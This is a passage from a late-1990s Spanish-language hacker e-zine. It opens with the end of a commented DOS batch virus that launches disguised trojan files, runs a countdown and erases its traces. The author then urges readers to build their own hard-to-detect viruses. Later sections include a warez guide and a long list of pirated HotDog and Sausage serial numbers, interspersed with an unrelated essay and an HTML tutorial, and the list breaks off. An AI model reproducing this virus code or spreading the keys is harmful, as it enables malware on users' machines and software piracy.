c:\windows\sysinis.ini cae aqui el control. if not exist c:\windows\bakbmb.ini goto kill ~@~ si no existe el otro troya brinca a kill :-( copy c:\windows\bakbmb.ini c:\windows\bye2.com /y >nul ~@~ copia el bakbmb.ini a bye2.com (troya#2) c:\windows\bye2.com ~@~ ejecuta el troya#2 cls echo. echo Bye Bye virus... por RareGaZz echo http://www.geocities.com/Baja/4426 echo. pause goto kill ~@~ brinca a Kill :kill ~@~ aqui se borran las huellas del virus (en caso de ser virus y no troya los ~@~ archivos ejecutados o tal vez solo una grafica. del c:\windows\after.bat >nul del c:\windows\bakbmb.ini >nul del c:\windows\sysinis.ini >nul goto end ~@~ brinca al final del virus. :menos6 ~@~ si encuentra el archivo countdw.006 lo copia a c:\windows\countdw.007 ~@~ y elimina el anterior. copy c:\windows\countdw.006 c:\windows\countdw.007 /y >nul del c:\windows\countdw.006 goto end :menos5 ~@~ si encuentra el archivo countdw.005 lo copia a c:\windows\countdw.006 ~@~ y elimina el anterior. copy c:\windows\countdw.005 c:\windows\countdw.006 /y >nul del c:\windows\countdw.005 >nul goto end :menos4 ~@~ si encuentra el archivo countdw.004 lo copia a c:\windows\countdw.005 ~@~ y elimina el anterior. copy c:\windows\countdw.004 c:\windows\countdw.005 /y >nul del c:\windows\countdw.004 >nul goto end :menos3 ~@~ si encuentra el archivo countdw.003 lo copia a c:\windows\countdw.004 ~@~ y elimina el anterior. copy c:\windows\countdw.003 c:\windows\countdw.004 /y >nul del c:\windows\countdw.003 >nul goto end :menos2 ~@~ si encuentra el archivo countdw.002 lo copia a c:\windows\countdw.003 ~@~ y elimina el anterior. copy c:\windows\countdw.002 c:\windows\countdw.003 /y >nul del c:\windows\countdw.002 >nul goto end :menos1 ~@~ si encuentra el archivo countdw.001 lo copia a c:\windows\countdw.002 ~@~ y elimina el anterior. copy c:\windows\countdw.001 c:\windows\countdw.002 /y >nul del c:\windows\countdw.001 >nul goto end :explode ~@~ rutina que al no encontrar c:\windows\userz1.dat empieza el conteo. if not exist c:\windows\win.com goto kill2 ~@~ si no existe c:\windows\win.com brinca a kill2 copy c:\windows\win.com c:\windows\countdw.001 /y >nul goto end :kill2 ~@~ elima el virus del sistema. del c:\windows\winstart.bat >nul del c:\windows\sysinis.bat >nul del c:\windows\bakbmb.ini >nul :end ~@~ la ultima rutina. if exist c:\windows\after.bat call c:\windows\after.bat ~@~ busca a after.bat si existe lo ejecuta. ----------FIN del bye bye virii por raregazz-----CHKSYS.BAT------------------- Espero le hayas entendido al codigo del virus, crea uno tu mismo y veras lo facil que es hacer virus efectivos y dificiles de detectar. Si usas el ejemplo contenido en el archivo adjunto a la revista (virii.zip) copia algun demo o programa no dañino a los archivos c:\windows\sysinis.ini y c:\windows\bakbmb.ini para que veas por tu mismo la efectividad del virus. Descomprime virii.zip y corre install.bat en una pc y cuando quieras empezar el conteo borra c:\windows\userz1.dat >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< R3v1S10/\/ D3 W4R32 por Siskel&Ebert A muchos nos gusta atiborrar nuestro espacio en disco para tener las mejores cosas que podamos conseguir en internet aunque casi siempre terminamos guardando programas que nunca volveremos a utilizar pero no los borramos por el temor de necesitarlos en cuanto uno de los clusters del archivo borrado sea ocupado por otro. Para que ustedes tengan una idea del warez que pueden conseguir en internet que peca de no estorbar me he puesto a escribir una guia de software inspirado en la guia para internet que aparecio en el numero 2 Para encontrar los programas usa los servicios de www.shareware.com o www.download.com aunque tambien podrias buscar el archivo por el nombre del programa en alguna maquina de busqueda. [ Despues de algun tiempo de busqueda (aprox. 15 minutos) RareGaZz pone a su entera disposicion TODOS los programas mencionados en este articulo en la pagina oficial del MagaZine... CkSmkr ] >-ENCRIPCION-< PGP ~~~ El mejor programa de encripcion de archivos que puedan tener. La encripcion se basa en la tecnica de las llaves publicas y como ya fue ampliamente revisado en esta revista ahi la dejamos. PGPFONE 1.0b2 ~~~~~~~~~~~~~ Programa para conversaciones por telefono seguras. Ya lo he utilizado un par de veces y nada es mas gracioso que usar este programa, te pones los audifonos de tu tarjeta de sonido conectas el microfono y si tu tarjeta no es "full duplex" terminaras usando el telefono como un radio cb. Imagina una conversacion tipica con pgpfone: - watz up! tienes algun nuevo warez? cambio - simon me acaba de llegar el office 97!! cambio - a toda eme cuando puedo pasar por el? cambio - mañana a las dos en punto donde siempre... cambio y fuera. Blowfish Advanced 95 ~~~~~~~~~~~~~~~~~~~~ Mejor programa para encripcion basada en claves no podran encontrar! Tiene muchisimas opciones para todos los paranoicos haya fuera. En este programa encontraras mas algoritmos que en tu libro de matematicas ademas tiene un feature especial llamado TEMPEST que permite escribir la clave sin temor a ser capturada por espias internacionales :))) si eliges la opcion tempest tu teclado producira 'ruido' y la pantalla se vera como una disco de tijuas a las 4 de la mañana. Los algoritmos que puedes usar para encriptar son : - Blowfish - Blowfish 32 - GOST - Triple DES - Cobra - IDEA [ La version mas nueva no lo tiene disponible ] Despues de encriptar puedes usar una de las tantas opciones de wiping que incluye SFS wiping (un tipo de eliminado de archivos) y otras. Tambien puedes usar mixed encription por si quieres usar dos algoritmos para encriptar tus archivos [ ya no disponible ] y si lo deseas cuenta con una opcion que si la eliges renombra todos los archivos encriptados con nombres totalmente insignificantes. Tiene muchas opciones por eso es imposible explicarlas todas en este texto lo malo es que la version shareware unicamente permite claves de 4 digitos por lo que el archivo necesario para registrarlo viene incluido en esta revista :) [ Despues de leer este texto busque el programa y me encontre con una version mas nueva y no aparece el algoritmo IDEA -usado en pgp- ni el `feature' ese de mixed encription asi que como buen hacker investigue... From: raregazz@bigfoot.com To: tis5maha@rz.fht-esslingen.de Subject: encription... >Why do you remove de double encryption routine?? That was the most hype >thing in your program and in version 82e is gone...along with IDEA. >It seems to me your program is getting better in design but worse in >security. Or may be am wrong, can you please tell me what was the error >in the double encription scheme? I need to know because I am still using >version 81a that seems to be more powerful and I need to know if the >encription am using is "secure" with the double encription thingie. From: tis5maha@rz.fht-esslingen.de To: raregazz@bigfoot.com Subject: Re: encription... >IDEA was removed due to license problems, but it will return in BFA97 >as a free driver which you can add to the application. >Double encryption was removed because it was futile. Sounds strange, >but one can prove it with the so-called "meet-in-the-middle" attack that >double encryption just increases the keyspace to one bit. Although the >attack is more or less just a mathematical thing (one will need megatons of >memory and computer power) I decided to remove this feature, because you'll >never know if someone has exploited that attack to work more efficiently. >The new UCDI concept in BFA97 will enable programmers to design their >own drivers as they like it (e.g. write a triple encryption driver with >a Blowfish-IDEA combination). > >Markus un agradecimiento al creador del programa por explicarme la razon de haber eliminado en su mas reciente version algunas features de su programa. Al parecer en verdad esta interesado en mantener fuerte y sin vulnerabilidades su pieza de software Blowfish Advanced. CkSmkr] Puffer ~~~~~~ No tan bueno como el anterior pero mas facil de usar para encriptar mensajes de email si las personas que se comunican saben la clave de desencriptado. Tiene varias desventajas (usa solo blowfish) pero es una buena opcion para los usuarios de windows 3.1 con una linea de comunicacion segura donde puedan pasarse la clave (telefono). Tiene la opcion de limpiar el espacio vacio del disco que parece no funcionar con windows 95. [ blowfish advanced 95 tambien tiene esta opcion y si funciona con win95 ] >-ACCESORIOS-< Powertoys ~~~~~~~~~ Son unas herramientas de microsoft que realizan distintas cosas, yo no les recomendaria instalar todas pero si deskmenu y tweak UI. Deskmenu es un icono en la barra de tareas que al ser presionado despliega un menu con los contenidos del escritorio. Tweak UI tiene muchisimas opciones asi como tambien settings de 'paranoia'. Para instalar se descomprime powertoys en un directorio temporal y se hace doble click en los archivos .inf del programa que se quiera instalar. AniDesk ~~~~~~~ Utileria 100% estetica para nuestro escritorio. Una vez ejecutada pone en la pantalla un icono animado y hace que el escritorio se vea comico. contiene varios iconos como la tierra, una hamburguesa y varios mas aunque tambien puedes crear los propios. WINZIP 6.3 32bits ~~~~~~~~~~~~~~~~~ La mejor compresion de datos con la capacidad de guardar archivos con nombres largos y crear autoexecutables para windows 95. Los botones son unas graciosas graficas en 3D. Sin duda el mejor programa de compresion. Disponible en www.winzip.com y el codigo de registro esta en los numeros anteriores de la revista. PureVoice -Qualcomm- ~~~~~~~~~~~~~~~~~~~~ De los creadores de Eudora sale este programa que nos permite enviar y recibir mails con voz clara y de poco tamaño. Un mensaje de unos 300k podria mandar hasta 5 minutos de voz continua. Tiene dos tipos de voz, la de mas alta calidad ocupa 13k por segundo y la otra de menor calidad 8k por segundo. [ puedes enviar correo a raregazz usando este programa :) ] RegClean ~~~~~~~~ Un casi excelente limpiador de nuestro registro de windows 95 que acelera el tiempo necesario para iniciar nuestra computadora. Tiene algunos errores por ejemplo cuando ponemos en nuestros folders el "auto arrange" despues de ejecutar esta utilidad esta opcion se desabilita. MapEdit ~~~~~~~ Con este programa los mapas graficos para archivos HTML son faciles de hacer y sin conocimiento del lenguaje hyper text markup languaje. Se maneja con figuras geometricas y el codigo generado se copia al clipboard y despues se tiene que pegar al archivo HTML o el programa lo genera. serial number: BJJNBKBA >-AUDIO-< Cool Edit 96 ~~~~~~~~~~~~ Esta programa es especial para usar y editar archivos de audio. Tiene filtros reductores de ruido y efectos especiales como marcianos, tuneles y radio. Con el programa shareware unicamente se puede elegir entre un efecto de muchos pero el codigo de registro es: name: raregazz name: cooldude serial: XHMXJUIB serial: LWGLJZRP Quiero agradecer a camelo por pasarme este programa :-O RealPlayer ~~~~~~~~~~ Un plugin para tu browser que te permitira escuchar sonido en linea rapidamente y tambien video. Las versiones light son gratuitas y las puedes conseguir en www.real.com y/o www.realplayer.com >-GRAFICOS-< LviewPro ~~~~~~~~ Programa para ver graficos de distintos formatos. Tiene tambien muchos filtros que sirven para agregar distintos efectos a las imagenes como el blur y tambien suaviza la imagen en caso de ser esta de baja calidad. Con este programa puedes crear slideshows del numero de graficas que quieras y tambien en una pantalla puedes poner un preview de todas las graficas que tu quieras. Todo esto desde el menu file-multiple open. El codigo de registro esta en el primer numero de la revista. MicroAngelo 95 ~~~~~~~~~~~~~~~ Si necesitas editar o crear tu propio icono animado para windows 95 (.ani) o un icono normal (.ico) este programa te permite hacerlo. Hay dos versiones de este programa en internet y una no permite la creacion de iconos animados. El crack esta en los numeros pasados de la revista. Microsoft Gif Animator ~~~~~~~~~~~~~~~~~~~~~~ Un simple animador de imagenes gif89 tipo cuadro por cuadro. Lo util de este programa es la capacidad de pasar del formato avi al gif las animaciones. No tiene ninguna otra opcion y es gratuito. Lo puedes encontrar en www.microsoft.com Morpher for Windows 1.2 ~~~~~~~~~~~~~~~~~~~~~~~ Este programa es un poco complicado pero una ves entendiendo su manejo es facil crear el efecto morphing de dos imagenes bmp. vienen dos ejemplos bastante impresionantes que sirven de base para tus trabajos. El programa funciona con windows 3.1 y windows 95. Codigo de registro: Name: (cualquier nombre) Code: 97044 Ulead Gif Animator 1.5 ~~~~~~~~~~~~~~~~~~~~~~ Este animador de GIF's deja atras a la competencia ofreciendo varios efectos para las animaciones que valen la pena un vistazo! Tambien puede importar animaciones avi's y añadirle efectos como persianas, morphing y algunos otros. El periodo de prueba es de 15 dias y aun no tengo el crack :( ACIDDRAW 1.2 ~~~~~~~~~~~~ Un programa de dibujo ANSI/ASCII que permite crear y editar archivos graficos COM, ANSI, ASCII, BINARIOS, PASCAL, C, PCBOARD, y ASM. Los menus de edicion de graficos son faciles de entender y tambien hay una utilidad llamada AcidView para ver los archivos que este programa genera y los graficos como jpg y gif. >-INTERNET-< HomeSite ~~~~~~~~ Este programa permite la creacion de paginas web como si se tratara de un editor de textos comun. No es necesario el conocimiento del HTML pero algunas cosas como la creacion de mapas graficos resultan complicadas usando este programa. www.allaire.com Name: Siskel&Ebert Name: RareGaZz Code: 239624079488 Code: 319539881279 >-HACKS-< John the ripper 1.3 Alpha 3 (DOS) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ El mejor cracker disponible para computadoras pentium. Es rapidisimo y no son necesarias las listas de palabras para su funcionamiento ya que tiene un feature llamado "incremental generator" que si editamos el archivo john.ini podemos hacer un ataque bruto probando todos los caracteres de cierto numero de caracteres [ ??? ] Si quieres probar el funcionamiento de tu cracker mide el tiempo que se tarda en quebrar el siguiente password: micuenta:KkhJDtJd.gERE: -el password encriptado es raul- [ esto es lo mas cerca que mucha gente estara de un /etc/shadow ! >:) ] XiT ~~~ Otro cracker para DOS pero muchisimo mas lento que john the ripper. Tiene pocas features y es bueno unicamente para las 386's o peores... Hackers Utility v1.02 ~~~~~~~~~~~~~~~~~~~~~ La mejor utileria para hackers que hasta ahora haya visto. Junto con el programa vienen serial numbers, funciones del sistema como shutdown, log off y muchas otras para windows NT. Tambien tiene incluidas como herramientas un cracker de unix mas rapido que cracker jack y un rapidisimo cracker de archivos comprimidos zips. Tiene tambien utilerias de red como finger, un scanner de puertos I.P y muchas otras cosas. Este programa merece 5 estrellitas en la frente (o sus autores). [ no esta disponible en la pagina web :( por que no lo encontre. cksmkr ] WinHacker 95 ~~~~~~~~~~~~ Un hacker personal para windows 95. Tiene muchas opciones disponibles pero la mas significativa es la capacidad que tiene el programa de cambiar el nombre de la persona y la compañia a la que esta registrado windows. Tambien puede remover la pantalla de inicio de windows 95 y puede configurar tu sistema win95 para que inicie en prompt DOS. >-FINALE-< Abur se cuidan y no coman tierra. = la mayoria de los hacks los saque de www.astalavista.com = >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< Exceso Digital Recientemente me he visto forzado a buscar nuevo software y hardware desde que empeze a sufrir la indignidad de actualizar mi sistema. No puedo creer que los productores han avanzado tan salvajemente mientras yo no estaba viendo - la complejidad esta fuera de control. He pasado mucho tiempo frente a las computadoras en los años pasados. La gente a hecho chistes acerca de mi dependencia al email y toda mi familia me recuerda usando una laptop desde mis primeros dias en preparatoria. Pero las computadoras pueden ser como botas de eskiar. Las viejas tienden a mantenerse eficientes, comprar unas nuevas significa dolor de pies. Asi que yo estoy chapado a la antigua en computadoras. Ni siquiera uso un programa de email sino que lo leo y mando desde mi adorable terminal UNIX. Pero inevitablemente llega un tiempo en que esas botas de piel favoritas tienen que ser cambiadas por un nuevo par. Ese tiempo me llego en los primeros dias de 1997 y los nuevos dolores de cabeza digitales que he descubierto aun no se han calmado. Para mi suerte cuento con la ayuda de unos de los mejores en el terreno de las computadoras, los llamados "power users" me pregunto que es lo que hace la sociedad en general cuando necesitan ayuda ? Software excesivo El problema radica en el tipo de software que usamos, lleno de "features" y cositas que hacen explotar en tamaño a los nuevos sistemas. Soy propenso a quejarme cada vez que Andy (intel) crea un procesador mas rapido Bill (microsoft) usa mas de el. Resulta ser no tan gracioso. Simplemente hecha un vistazo a la complejidad del Word de microsoft mas reciente. Es simplemente increible, y cada nueva version se esta poniendo peor. Ha llegado el punto en que la mayoria de los programas son inservibles y se ejecutan mas lento que como lo hacian una decada atras. ¿ Que esta mal con el chico de Redmond Mr. Microsoft ? Quizas aprenda algo de la facilidad de uso de su nueva compra: WebTV. Mi vida adulta y profesional se basa en intentar hacer a las computadoras mas faciles de usar. En el año de 1965 las personas pensaban que solo los maricas necesitaban graficas. En 1972, cuando gastabamos 256k guardando imagenes la gente lo veia como una indecencia y arrogancia. ¿Por que alguien utilizaria tanta harina en la cubierta y no en el relleno? Tres decadas despues encontramos una generacion de niños que no cuenta la memoria en k's sino en m's (y proximamente en G's). Esto es maravilloso, pero fijense en lo que utilizamos esa memoria!! La interfaz no ha cambiado radicalmente desde la introduccion de la Macintosh mas de una decada atras. Es solo mas dificil de usar y obsesivamente compleja. Alguien necesita un reloj despertador. Como un devoto de las Macintosh con suficientes de ellas en mi closet, me encuentro actualmente frustrado con los ultimos modelos. La pequeña cara que nos recibia en el inicio de nuestras sesiones se a vuelto tan compleja que una Mac no es mas facil de usar que una Wintel. Asi, como muchos otros, decidi que era tiempo de cambiar de plataforma. Hice mi primera entrada con Windows hace un mes o dos y quede tan apaleado que regrese corriendo a mi Mac como alguien que regresa al camion despues de probar el nuevo tren subterraneo. Me sorprendio que mucha gente usara windows 95 sin quejas y supongo eso se debe POR QUE NO HAY ALTERNATIVA. Ni PC o NC, sino SC La gente me pregunta con frecuencia que opino de la NC (Network Computer), una idea de la gente de Oracle que se basa en una terminal casera con un drive removible y todos mis datos en algun servidor lejos de mi alcance. Bill Gates viendo esto como una amenaza a su imperio a lanzado ya su terminal Windows para la NC, una vez mas el mal predomina. El hecho triste es que NC o PC, las dos, estan terriblemente mal. Pero tu y yo no tenemos alternativa. El mundo no necesita una PC o NC sino una SC (scalable computer) que seria una maquina modular que fuera tan simple como el pay (y sin costar mucho mas) y que tenga la capacidad de crecer de una simple editora de textos a una supercomputadora. Personalmente estoy decidido a permanecer en el punto mas bajo de la escala. Por que? pues por que no hay cupo para Windows 95 en Africa. Muchas otras partes del mundo tambien necesitan equipo facil de conseguir y manejar. Siempre pense que este era un problema diferente al que me preocupaba a mi pero repentinamente abri los ojos y me di cuenta que mi problema no es mucho mas distinto al de un pakistani tratando de manejar su primera computadora sin importar que yo tuviera talento a mi dispocision y recursos. Las computadoras hoy en dia son terriblemente dificiles de usar. Que otra cosa podemos hacer aparte de quejarnos? es tiempo de una huelga por los usuarios de computadoras? claro que si. Cualquier persona que este creando los sistemas del mañana debe poner los pies en la tierra y darse cuenta que las aplicaciones del mañana necesitan ser aplicaciones faciles de usar con operaciones sencillas. Necesitan dejar de hacer software con opciones sofocantes que son creados por genios para genios. ¿ por que no intentar hacer algo para el resto de nosotros ? Una solucion por el momento seria recomendar a los principiantes a usar un servicio en linea para entrar a internet como AT&T WorldNet (mexico).Pero cuando trate de instalarlo yo mismo las primeras palabras del instructivo decian "Apague la proteccion del software para virus usando el extensions manager" ¿ QUE DIABLOS SIGNIFICA ESO PARA PAPA Y MAMA ? Despues, como era predecible, el instalador causo un crash en mi sistema. NiK >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ServerHacker Productions(c) Presenta... ***************** HTML Para Mortales ***************** Creado exclusivamente para RareGaZz HiApAlZ a ver si logro hacerlos entender el HTML a los que no saben como hacer sus paginas para la red. A lo mejor luego hago otro texto sobre esto y despues prometo escribir una guia para poder poner una pagina gratuita en la red. Mientras tanto si ya saben de html mejor brinquense este monton de *%#& por que se les puede hacer shitty :( EL PRINCIPIO Lo primero es conseguir un editor de textos para hacer los archivos HTML. notepad de windows funciona bien aunque tambien aguanta vi de unix. si usas un procesador DOS para los HTML algunas letras no se podran ver bien en el navegador. Los comandos que el navegador interpreta se ponen en medio de los caracteres < >. Si algun comando no lo entiende aparecera en el documento tal y como esta en el texto incluyendo los < >. Voy a darles un ejemplo para que vean como esta la cosa con los comandos de este rollo. vamos a suponer que necesitamos que aparezca la palabra "ESTO" en letras italicas; el comando es <i> y se usaria asi: ES <i>ESTO</i> OTRA PALABRA Para evitar que las siguientes palabras tambien se vean italicas se debe marcar el final del comando con la diagonal / seguida del comando usado como se ve en el ejemplo. la mayoria de los comandos deben terminar como se muestra en el ejemplo. COMANDOS BASICOS Al iniciar nuestro documento HTML el primer comando que debemos poner en el archivo es <HTML> (tambien debe terminar al final del archivo con </HTML>). esto le dice al navegador que se trata de un hypertexto. seguido del comando inicial html se debe definir el encabezado de la pagina o header, el header es el texto que aparece en la barra superior del navegador cuando entramos a una pagina y tambien es lo que se queda registrado en el bookmark de un navegador. El encabezado se define con el comando <HEAD> y termina </HEAD>.Muchas veces es usado el comando <TITLE> despues de head para definir el titulo y debe ser terminado asi </TITLE> antes de terminar el encabezado. Despues sigue el cuerpo del documento y este se define con el tag <BODY> este es el ultimo comando para definir nuestro documento. cuando el body se pone todo lo que se escriba abajo de el sera mostrado en el navegador. Ahora veremos un ejemplo sobre lo que trato de explicar. <html><head><title>Mi primera pagina</title> </head><body> Esto es un Test </body></html> Esos simples codigos haran que aparezca en el visualizador (noten que por fin se me ocurrio un sinonimo) un doc que dira "Esto es un Test" con el titulo en la barra superior "Mi primera pagina". Vamos apenas empezando... Con el comando <BODY> podemos decirle al visualizador el color de las letras de nuestro documento y sobre que fondo deben estar tambien si queremos una grafica como background -cajum..fondo- ahi tenemos que indicarlo. El color de los links, de los links ya seguidos y de los links activos como los de email tambien se pueden definir en el mismo tag <BODY> usando los parametros que tratare de explicarles. LINK="#000000" El parametro link define el color de los links que aparezcan en el doc. VLINK="#000000" De este color seran los links que ya hayan sido seguidos por ese navegador. BGCOLOR="#ffffff" Aqui se escribe el color del fondo de la pagina. BACKGROUND="grafica.gif" Si quieres una grafica como fondo asi lo escribes. TEXT="#000080" El color del texto. ALINK="#0000FF" El color de los links activos. Los colores son escritos en valores hexadecimales y si usamos los parametros estos el tag BODY quedaria asi: <BODY LINK="#000000" VLINK="#000000" BGCOLOR="#ffffff" BACKGROUND="grafica.gif" TEXT="#000080" ALINK="#0000FF"> COMANDOS ADICIONALES Sonidos ~~~~~~~ Despues de la etiqueta BODY podria usarse esta linea para hacer sonar un midi en nuestro documento como fondo. El comando es <BGSOUND> ejemplo: <BGSOUND SRC="algun.mid" LOOP=INFINITE> ( este comando NO termina con </BGSOUND> ) Otra forma de incluir musica para los visualizadores que no toquen los midis con el comando anterior es: <embed src="algun.mid" autostart="true"> El parametro autostart="true" podria ser autostart="false" para permitir que la persona que vea nuestro documento active el sonido por su cuenta. Al igual que el otro comando para la musica este tampoco requiere el comando adicional con la diagonal. Presentacion ~~~~~~~~~~~~ <BLINK> Este es uno de los comandos mas inutiles de netscape y para lo que sirve es para hacer que algo centellee pero como todos los relojes de las computadoras van a distinta velocidad este tag a veces pasa sin que sea notado. <H1> Este comando sirve para hacer los titulos o encabezados de algun tema a tratar. Usando el tag <H1> el texto que este entre ese comando sera de tamaño grande y bold. Ejemplo: <h1> hola </h1> <H2> Lo mismo que el anterior solo que mas pequeño. <H3> Aun mas pequeño. <HR size=?> El comando <HR> pone una linea horizontal en el visualizador que sirve para dividir los contenidos de alguna pagina. Si se le agrega el parametro size= se puede cambiar el grosor de la linea. <FONT SIZE=?> Cuando se quiera cambiar el tamaño de la letra se usa este tag de html reciente. El texto entre el tag <font size=3> </font> sera de tamaño 3. Todos los comandos fonts deben terminar con el comando </font> incluyendo el siguiente. <FONT COLOR=?> Cambia el color de los caracteres entre el tag <font color=red> y </font>. Los colores se especifican por sus nombres en ingles. <B> Este comando pone <b> BOLD </b> el texto entre los tags. <I> Para poner <i> italicas </i> un texto o palabra usa este comando. <U> Si quieres <u> subrayar </u> algo importante. Ejemplo General: <font size=3><font color=blue><b><i><u> HOLA!! </u></i></b></font></font> Los comandos pueden ser juntados para crear mejores efectos pero siempre termina el comando correctamente para no modificar el texto sobrante. Espaciado ~~~~~~~~~ <BR> Se usa cuando se quiere pasar un espacio en el documento.No requiere usarse la diagonal para terminarlo. <P> Marca el fin de un parrafo. Tampoco es necesario terminarse con la diagonal. Forms ~~~~~ Las formas se definen con los comandos <form> y </form>. Son incluidos cuando queremos feedback o respuestas de los visitantes de una pagina. En medio de estas etiquetas existen otros tags que funcionan para dar formato a la forma en que seran insertados los datos. Estas son: <select>, <textarea> e <input>. Los atributos que le corresponden a la etiqueta o tag <form> son: METHOD y ACTION. El atributo METHOD especifica la manera en que el visualizador enviara la informacion al servidor valiendose de dos auxiliares que son GET y POST. El atributo ACTION dice hacia donde se deberan enviar los datos obtenidos por la forma, las formas mas comunes son por medio de un script CGI o tambien hacia una direccion de correo especificandola con la etiqueta MAILTO como en el ejemplo siguiente: <FORM METHOD="POST" ACTION=MAILTO:midireccion@decorreo.net> <TEXTAREA> Esta etiqueta permite una entrada libre al usuario ofreciendose como un campo para comentarios. Tiene 3 atributos que definen como sera esta area de texto: name, rows y cols. name especifica el nombre del campo de texto. rows especifica el numero de lineas de texto. cols especifica el numero de columnas del area. Un ejemplo de esta etiqueta es: <textarea name="comentarios" rows="8" cols="40"> Comentarios...</textarea> <INPUT> Esta es una de las etiquetas mas usadas en las formas ya que tiene distintos formatos como simples lineas de texto, botones de radio y las cajas de marca. La etiqueta a usar para simples lineas de texto como nombres y direcciones de correo electronico es: TEXT. type="text" se usa para mostrar una linea de texto. Se puede eligir el numero maximo de caracteres y su longitud con size y maxlength. Este es un ejemplo de TEXT: Nombre:<input type="text" name="nombre" size=50 maxlength=50><br> Edad:<input type="text" name="edad" size=15 maxlength=10><br> CHECKBOXES Los checkboxes son utiles en ocasiones cuando las preguntas no son de opcion libre sino que las respuestas estan predeterminadas por el creador de la forma y pueden ser escogidos 2 o mas campos. Ejemplo: Selecciona una opcion:<br> <input type="checkbox" name="opcion" value="uno">Uno <input type="checkbox" name="opcion" value="dos">Dos <input type="checkbox" name="opcion" value="tres">Tres<p> RADIO BUTTONS Los botones de radio a diferencia de los checkboxes unicamente es posible elegir uno de ellos de cierto campo. Selecciona una opcion:<br> <input type="radio" name="opcion" value="uno">Uno <input type="radio" name="opcion" value="dos">Dos <input type="radio" name="opcion" value="tres">Tres<p> RESET Si se comete algun error a la hora de llenar la forma se utiliza este elemento para borrar todos los campos. He aqui un ejemplo: <input type="reset" value="Limpiar la forma y empezar de nuevo"> SUBMIT Este elemento se utiliza cuando se a llenado la forma y esta lista para ser enviada. Ejemplo: <input type="submit" value="Mandar la forma"> Un ejemplo completo de como una forma seria es el siguiente ejemplo tomado de la pagina de la revista raregaz en la seccion log-in :) <FORM><FORM METHOD="POST" ACTION="/cgi-bin/homestead/mail.pl?raregazz"> Nombre____ <INPUT TYPE="text"><BR> E-Mail_____ <INPUT TYPE="text"><BR> Ciudad,Paφs_ <INPUT TYPE="text"><br> Comentarios <INPUT TYPE="text"><p> <INPUT TYPE="submit" VALUE="Mandar"> <INPUT TYPE="reset" VALUE="Volver a Empezar"><p> </FORM> The End ~~~~~~~ >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< ****************************************************************************** >[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]< >-C0D3Z-< "Im too sexy for my warez" RareGaZz manda la casa por la ventana y gasta mas de 200 dolares en darles placer a sus lectores con los siguientes codigos...NNOOOTTT!!! Gracias a un colaborador anonimo ponemos a tu mano los siguientes codigos para registrar casi toda la linea de software creado por la Cia. sausage creadores del famoso editor de HTML HotDog. Para poner tu mano sobre estos programas mientras dura la oferta apunta y dispara tu navegador a www.sausage.com donde podras encontrarlos en la seccion de software. ~~~~~~~~~~~~~~~ Bookworm Sirve para crear "jump boxes" Java ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0MVLQQVWV6RZXCCAE9YP ------------------ end ------------------- Broadway Crea Java Marquess ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0RBQMUNC08APMYNLK5YT ------------------ end ------------------- Clikette Botones 3D ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 04RN4FE74M0P5JC7P728 ------------------ end ------------------- Crosseye 1 Crea mapas graficos (supongo usando java) ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0J4HVC98ZAKXK1CH4JZY ------------------ end ------------------- Upgrade Egor 1 or 2 --> Egor 3 Egor es un animador de graficos basado en Java, si ya tienes el 1 o 2 este es el codigo para registrar el upgrade... ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0R5BBAC60TB0BXHC4XR9 ------------------ end ------------------- FrameGang 1 quieres poner frames a tu pagina? este programa es lo que necesitas! ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 007NTFEF3615EV1J7JAM ------------------ end ------------------- Flash 2 Texto Scrolling ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0FVN3BJZRVRLMBHUV6CY ------------------ end ------------------- Site FX applets java compactos para efectos graficos ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0MH2DTCYRDHJE8440UR4 ------------------ end ------------------- Swami Programa para animar texto usando Java [ keewwl ] ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0MW1Q2RNWKKJTBYFNE2W ------------------ end ------------------- Upgrade HD Std 16 1 or 2 --> HD Pro 3 (for Win95) Upgrade del hotdor standard al profesional ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0QRLZND3XAJX7MN97T40 ------------------ end ------------------- Weenie - Bang Graficos animados ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 02UKMA9YRY91QH5PL9A3 ------------------ end ------------------- Weenie - Bullets Graficos animados ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 00EN2YWF3CUBQXF6W05P ------------------ end ------------------- Weenie - Critters Graficos animados ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0K6UZVDRCFRTKK6FN9NT ------------------ end ------------------- Upgrade HotDog Pro 1 - HotDog 16 bit v2 ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 03B13NQX8N29LD72EL78 ------------------ end ------------------- HotDog 16 bit v2 Duh? ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 05U0B6MFBF8U0XUYFCYP ------------------ end ------------------- Weenie - Spinners Graficos animados ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0FEWBQLTU91LHJRZ9BC4 ------------------ end ------------------- Upgrade HotDog Std 1 or 2 --> HotDog 16 bit v2 ---------------- cut here ---------------- User Name: emilio carrion Serial Number: 0HZYUR6TPDTTL6Q4L2WA ------------------ end ------------------- Upgrade HotDog Pro 32 v1 --> HD Pro 3 (for Win95) ---------------- cut here 